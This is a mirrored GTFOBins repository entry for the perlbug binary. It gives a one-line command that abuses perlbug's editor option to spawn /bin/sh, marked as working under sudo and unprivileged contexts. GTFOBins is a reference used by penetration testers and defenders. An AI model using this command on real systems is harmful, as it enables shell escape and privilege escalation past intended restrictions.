1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-08 06:56:15 +01:00
GTFOBins.github.io/_gtfobins/perlbug
2026-01-13 18:58:28 +01:00

12 lines
237 B
Plaintext

---
functions:
shell:
- code: |-
perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh #'
comment: |-
This requires to press `Enter` serveral times before the shell is spawn.
contexts:
sudo:
unprivileged:
...